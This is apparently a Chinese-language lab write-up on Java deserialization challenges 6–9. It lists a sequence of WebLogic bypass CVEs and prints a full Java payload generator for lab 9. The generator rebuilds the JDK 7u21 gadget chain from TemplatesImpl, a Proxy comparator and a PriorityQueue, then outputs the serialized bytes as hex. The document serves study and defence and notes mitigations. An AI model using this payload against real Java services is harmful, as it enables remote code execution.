JavaDeserializeLabs-Writeups(6-9)

最近在复习 Java 的一些基础，有些已经忘了，于是找到了一个网上的靶场，很适合我这种新手练习

lab6-8

感觉就是对应Weblogic这几个绕过

CVE-2015-4852->CVE-2016-0638->CVE-2016-3510->CVE-2017-3248->CVE-2018-2628->CVE-2018-2893->CVE-2018-????。感兴趣的可以自己搜来看下，基本都差不多

lab9

最开始我没意识到它是 7u21 那条链的改写，做完之后回去复习了java漫谈才想起来

package Payload;

import Utils.Encode;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javax.xml.transform.Templates;
import java.lang.reflect.Field;
import java.lang.reflect.Proxy;
import java.math.BigInteger;
import java.util.Comparator;
import java.util.PriorityQueue;

/**
 * Lab 9 reference payload from the write-up: serializes a {@link PriorityQueue} whose
 * comparator is a {@link Proxy} backed by a {@code TemplatesImpl} — the same shape as
 * the JDK 7u21 gadget chain the lab reworks (see the note above the listing).
 *
 * Defender's view: the chain only uses JDK classes, so no application-specific class is
 * required — native Java deserialization of untrusted bytes is the whole problem.
 * Mitigations are a JEP 290 {@code ObjectInputFilter} with a reject-by-default
 * allowlist, a patched JDK, and not feeding untrusted input to {@code ObjectInputStream}
 * at all.
 *
 * Depends on helpers not shown in this listing: {@code Reflections},
 * {@code SerializeUtil}, {@code MyInvocationHandler}, {@code Utils.Encode} and
 * {@code marshalsec.util.Reflections}. Their contracts are assumed from their names.
 */
public class exp {

/**
 * Builds the queue and prints its serialized form as a hex string.
 *
 * @param args unused
 * @throws Exception propagated from the reflective helpers and serialization
 */
public static void main(String[] args) throws Exception{
// Fill TemplatesImpl's private fields reflectively. The argument to
// getTemplatesImpl ("xxxxxx") is a placeholder the author left in; its meaning
// depends on the unshown SerializeUtil helper.
TemplatesImpl tmpl = new TemplatesImpl();
Field bytecodes = Reflections.getField(tmpl.getClass(),"_bytecodes");
Reflections.setAccessible(bytecodes);
Reflections.setFieldValue(tmpl,"_bytecodes",new byte[][]{SerializeUtil.getTemplatesImpl("xxxxxx")});

Field name=Reflections.getField(tmpl.getClass(),"_name");
Reflections.setAccessible(name);
Reflections.setFieldValue(tmpl,"_name","s");
// _tfactory is set without the getField/setAccessible pair used above —
// presumably setFieldValue handles accessibility itself; not verifiable here.
Reflections.setFieldValue(tmpl, "_tfactory", new TransformerFactoryImpl());


// Dynamic proxy implementing Comparator; the handler is constructed over the
// Templates interface. NOTE(review): exp7.class is referenced inside class exp —
// looks like a leftover from an earlier lab; any class on the same loader would do.
MyInvocationHandler s = new MyInvocationHandler(Templates.class);
Comparator comparator = (Comparator) Proxy.newProxyInstance(exp7.class.getClassLoader(), new Class[]{ Comparator.class },s);


// Two BigIntegers make the queue non-empty, then the backing "queue" array is
// read reflectively and slot 0 is overwritten with the TemplatesImpl.
// NOTE(review): this uses marshalsec.util.Reflections while the rest of the
// method uses the project's own Reflections — presumably another leftover.
// The raw-typed PriorityQueue(2) constructor call triggers an unchecked warning.
PriorityQueue<Object> queue = new PriorityQueue(2);
queue.add(new BigInteger("1"));
queue.add(new BigInteger("2"));
Object[] queueArray = (Object[])((Object[]) marshalsec.util.Reflections.getFieldValue(queue, "queue"));
queueArray[0] = tmpl;

// Install the proxy as the queue's comparator via the private field.
Field field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
field.setAccessible(true);
field.set(queue, comparator);
// Hex-encoded serialized queue, printed to stdout for the lab to consume.
System.out.print(Encode.objectToHexString(queue));
}
}